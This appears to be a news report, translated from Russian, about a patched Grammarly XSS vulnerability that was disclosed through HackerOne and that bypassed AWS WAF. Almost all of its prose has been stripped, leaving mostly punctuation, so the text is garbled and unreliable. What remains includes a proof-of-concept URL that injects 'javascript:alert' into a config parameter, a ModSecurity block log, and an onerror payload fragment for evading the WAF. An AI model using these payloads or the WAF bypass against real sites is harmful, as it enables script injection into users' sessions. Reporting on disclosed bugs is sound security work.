Grammarly Patches XSS Vulnerability To Bypass AWS WAF

Grammarly — -, . , . , Grammarly . , XSS- AWS WAF.





. -, (Frans Rosen), HackerOne, 6 .





-, $3000, XSS- $50-$100.





: «Config override using non-validated query parameter allows at least reflected XSS by injecting configuration into state» (« config , , XSS- ») https://hackerone.com/reports/1082847.





— JavaScript, . , - XSS, Grammarly, AWS WAF.





,

XSS:





https://app.grammarly.com/docs/new?config={%22account%22:{%22subscription%22:%22javascript:alert(document.domain)//%22},%22api%22:{%22redirect%22:%22javascript:alert(document.domain)//%22}}







config JSON . JSON subscription redirect XSS- alert(). , , mod_security WAF, :





2021/03/03 01:10:44 [error] 41#41: *1 [client 172.17.0.1] ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `28' ) [file "/etc/modsecurity.d/owasp-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "80"] [id "949110"] [rev ""] [msg "Inbound Anomaly Score Exceeded (Total Score: 28)"] [data ""] [severity "2"] [ver "OWASP_CRS/3.2.0"] [maturity "0"] [accuracy "0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "172.17.0.1"] [uri "/docs/new"] [unique_id "161473384455.381362"] [ref ""], client: 172.17.0.1, server: localhost, request: "GET /docs/new?config={%22account%22:{%22subscription%22:%22javascript:alert(document.domain)//%22},%22api%22:{%22redirect%22:%22javascript:alert(document.domain)//%22}} HTTP/1.1", host: "localhost:8080"







AWS WAF :





, JSON , AWS WAF :





, , onerror, HTML-. . JSON, :





, JSON. , JSON WAF API, CVE-2020-13942 Apache Unomi RCE.





, AWS WAF JSON. Grammarly, , AWS WAF:





WAF:





JSON, . , ""onerror=javascript:alert('I-LOVE-AWS-WAF!') WAF.





, XSS AWS WAF. 1500 .





, . !








All Articles